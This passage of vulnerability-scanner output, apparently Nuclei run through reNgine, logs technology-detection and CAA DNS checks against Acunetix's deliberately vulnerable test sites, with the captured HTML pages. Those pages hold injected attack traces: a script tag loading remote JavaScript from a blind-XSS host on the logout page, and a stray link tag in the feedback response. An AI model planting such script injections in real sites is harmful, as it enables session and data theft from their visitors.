class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Thank you very much for your feedback! \\u003c!-- invalid --\\u003e\\n\\u003clink src='http://localhost/link'\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:41.904904264Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0' 'http://testhtml5.vulnweb.com/like'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"angular\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/logout\",\"path\":\"/logout\",\"matched-at\":\"http://testhtml5.vulnweb.com/\",\"request\":\"GET /logout HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:37 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:41.904994742Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' 'http://testhtml5.vulnweb.com/logout'\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 23288\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 23288\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86400\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:42.223381917Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 55205\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 55205\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1799\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:42.22599361Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 48265\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 48265\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1799\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:42.229493932Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 49748\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 49748\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1799\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:42.233298142Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 18008\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 18008\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86399\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:42.236244138Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 9434\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 9434\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1799\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:42.278093473Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 791\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 791\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; 